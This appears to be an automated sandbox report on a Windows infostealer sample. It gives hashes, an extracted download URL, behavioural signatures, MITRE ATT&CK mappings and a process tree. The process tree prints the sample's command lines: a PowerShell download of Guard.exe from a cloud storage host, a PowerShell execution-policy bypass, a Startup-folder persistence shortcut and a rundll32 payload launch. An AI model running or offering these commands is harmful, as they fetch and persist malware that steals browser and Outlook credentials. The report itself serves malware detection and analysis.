Analysis
-
max time kernel
92s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/11/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
Resource
win10v2004-20241007-en
General
-
Target
e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
-
Size
1.1MB
-
MD5
c96a43db0abf02b0db8ca6efc658dc38
-
SHA1
a7c1b56d517d66e054e17c6cbd54bb3f1eafab8d
-
SHA256
e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
-
SHA512
6a607ee81d5fa7837643402c9c1d657dea5f0e819b64731f92bf72383d416d6e219520f15e8fb6fd5531fb0b7a1464b80ec30f9699b4304863b276cc2831ff8a
-
SSDEEP
24576:BrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaT+DCfkPY:B2EYTb8atv1orq+pEiSDTj1VyvBaTJkQ
Malware Config
Extracted
https://my.cloudme.com/v1/ws2/:slight-stood/:web/web.txt
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 1424 created 3548 1424 Guard.exe 56 PID 1424 created 3548 1424 Guard.exe 56 PID 1508 created 3548 1508 jsc.exe 56 -
Blocklisted process makes network request 3 IoCs
flow pid Process 6 3900 powershell.exe 17 4784 powershell.exe 39 4612 rundll32.exe -
pid Process 3900 powershell.exe 4784 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 1424 Guard.exe 1508 jsc.exe 400 jsc.exe -
Loads dropped DLL 2 IoCs
pid Process 4612 rundll32.exe 4612 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts rundll32.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1508 set thread context of 400 1508 jsc.exe 103 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5092 400 WerFault.exe 103 1672 4612 WerFault.exe 107 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2\Blob = 030000000100000014000000d2712372ee1b3de6df260caa5e2803763b5a36d220000000010000005e0200003082025a308201c3a0030201020208349f485c1aa3c093300d06092a864886f70d01010b050030653136303406035504030c2d4d6963726f736f66742052534120526f6f7420437172746966696361746520417574686f726974792032303137311e301c060355040a0c154d6963726f736f667420436f72706f726174696f6e310b3009060355040613025553301e170d3232313131383032333830335a170d3236313131373032333830335a30653136303406035504030c2d4d6963726f736f66742052534120526f6f7420437172746966696361746520417574686f726974792032303137311e301c060355040a0c154d6963726f736f667420436f72706f726174696f6e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100cde5095836c38f70ef8449624a6081796f881e34ac1e271959d5bfa4906ca8652aff7b674dd0f1efe8775116c2d3a8f89fd26b9753036bd2a9025194275b437c78ffa9b948b8926960f9913bb4a1f2752b25fea91186ce3b08aa5cf939e7312ea10a82ec5aa714ac80b7f8f61e7a0ae21b1134a83f50ba447f99dc7e18cdbba90203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010b05000381810095d99cb2bc2c9017e3e6492532c0cc001fb2bd1edb0857c0ff48d1d9f540cde51c6d5e3de0276e1d9f159e08468e4aaba73d222282f5ddec0b5926d9a2c4a26dfd4a3ac168a40edb25bc726d06dbae9bf42b0df2c42e6ee3372f9cd4c66d51607a113b13cdd22ac76ea9e5b0521536bed29f4e372dbfa8af5430700e4f5ec6bc rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 3900 powershell.exe 3900 powershell.exe 4784 powershell.exe 4784 powershell.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe 1508 jsc.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 3900 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 1508 jsc.exe Token: SeDebugPrivilege 1508 jsc.exe Token: SeIncreaseQuotaPrivilege 4968 WMIC.exe Token: SeSecurityPrivilege 4968 WMIC.exe Token: SeTakeOwnershipPrivilege 4968 WMIC.exe Token: SeLoadDriverPrivilege 4968 WMIC.exe Token: SeSystemProfilePrivilege 4968 WMIC.exe Token: SeSystemtimePrivilege 4968 WMIC.exe Token: SeProfSingleProcessPrivilege 4968 WMIC.exe Token: SeIncBasePriorityPrivilege 4968 WMIC.exe Token: SeCreatePagefilePrivilege 4968 WMIC.exe Token: SeBackupPrivilege 4968 WMIC.exe Token: SeRestorePrivilege 4968 WMIC.exe Token: SeShutdownPrivilege 4968 WMIC.exe Token: SeDebugPrivilege 4968 WMIC.exe Token: SeSystemEnvironmentPrivilege 4968 WMIC.exe Token: SeRemoteShutdownPrivilege 4968 WMIC.exe Token: SeUndockPrivilege 4968 WMIC.exe Token: SeManageVolumePrivilege 4968 WMIC.exe Token: 33 4968 WMIC.exe Token: 34 4968 WMIC.exe Token: 35 4968 WMIC.exe Token: 36 4968 WMIC.exe Token: SeIncreaseQuotaPrivilege 4968 WMIC.exe Token: SeSecurityPrivilege 4968 WMIC.exe Token: SeTakeOwnershipPrivilege 4968 WMIC.exe Token: SeLoadDriverPrivilege 4968 WMIC.exe Token: SeSystemProfilePrivilege 4968 WMIC.exe Token: SeSystemtimePrivilege 4968 WMIC.exe Token: SeProfSingleProcessPrivilege 4968 WMIC.exe Token: SeIncBasePriorityPrivilege 4968 WMIC.exe Token: SeCreatePagefilePrivilege 4968 WMIC.exe Token: SeBackupPrivilege 4968 WMIC.exe Token: SeRestorePrivilege 4968 WMIC.exe Token: SeShutdownPrivilege 4968 WMIC.exe Token: SeDebugPrivilege 4968 WMIC.exe Token: SeSystemEnvironmentPrivilege 4968 WMIC.exe Token: SeRemoteShutdownPrivilege 4968 WMIC.exe Token: SeUndockPrivilege 4968 WMIC.exe Token: SeManageVolumePrivilege 4968 WMIC.exe Token: 33 4968 WMIC.exe Token: 34 4968 WMIC.exe Token: 35 4968 WMIC.exe Token: 36 4968 WMIC.exe Token: SeDebugPrivilege 4612 rundll32.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe -
Suspicious use of SendNotifyMessage 10 IoCs
pid Process 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 1424 Guard.exe 1424 Guard.exe 1424 Guard.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 4780 wrote to memory of 3900 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 83 PID 4780 wrote to memory of 3900 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 83 PID 4780 wrote to memory of 4784 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 88 PID 4780 wrote to memory of 4784 4780 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe 88 PID 4784 wrote to memory of 1424 4784 powershell.exe 97 PID 4784 wrote to memory of 1424 4784 powershell.exe 97 PID 4784 wrote to memory of 1424 4784 powershell.exe 97 PID 1424 wrote to memory of 4072 1424 Guard.exe 98 PID 1424 wrote to memory of 4072 1424 Guard.exe 98 PID 1424 wrote to memory of 4072 1424 Guard.exe 98 PID 1424 wrote to memory of 1508 1424 Guard.exe 102 PID 1424 wrote to memory of 1508 1424 Guard.exe 102 PID 1424 wrote to memory of 1508 1424 Guard.exe 102 PID 1424 wrote to memory of 1508 1424 Guard.exe 102 PID 1424 wrote to memory of 1508 1424 Guard.exe 102 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 1508 wrote to memory of 400 1508 jsc.exe 103 PID 400 wrote to memory of 4444 400 jsc.exe 104 PID 400 wrote to memory of 4444 400 jsc.exe 104 PID 400 wrote to memory of 4444 400 jsc.exe 104 PID 4444 wrote to memory of 4968 4444 cmd.exe 106 PID 4444 wrote to memory of 4968 4444 cmd.exe 106 PID 4444 wrote to memory of 4968 4444 cmd.exe 106 PID 400 wrote to memory of 4612 400 jsc.exe 107 PID 400 wrote to memory of 4612 400 jsc.exe 107 PID 400 wrote to memory of 4612 400 jsc.exe 107 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1424
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:4072
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508
-
-
C:\Users\Public\jsc.exe"C:\Users\Public\jsc.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\cmd.execmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log",start3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 20284⤵
- Program crash
PID:1672
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 4003⤵
- Program crash
PID:5092
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 400 -ip 4001⤵PID:3204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4612 -ip 46121⤵PID:2372
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
4.0MB
MD57d96e2ae9f73e6b73fadaac62119c2a0
SHA1f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA2564ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA51201b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666
-
Filesize
40KB
MD5ab893875d697a3145af5eed5309bee26
SHA1c90116149196cbf74ffb453ecb3b12945372ebfa
SHA25602b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA5126b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc
-
Filesize
114KB
MD5013b18b14247306181ec7ae01d24aa15
SHA15ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA5122035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD518ce19b57f43ce0a5af149c96aecc685
SHA11bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558
-
Filesize
362B
MD5315eab1b113060397deb5d4013e64eae
SHA1d1578170885d0375b2aa22954badaeb36a539026
SHA256dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced
-
Filesize
10.7MB
MD54bdd41d598fd897ce21bd86264030448
SHA12907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA5127d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f
-
Filesize
46KB
MD594c8e57a80dfca2482dedb87b93d4fd9
SHA15729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA25639e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA5121798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc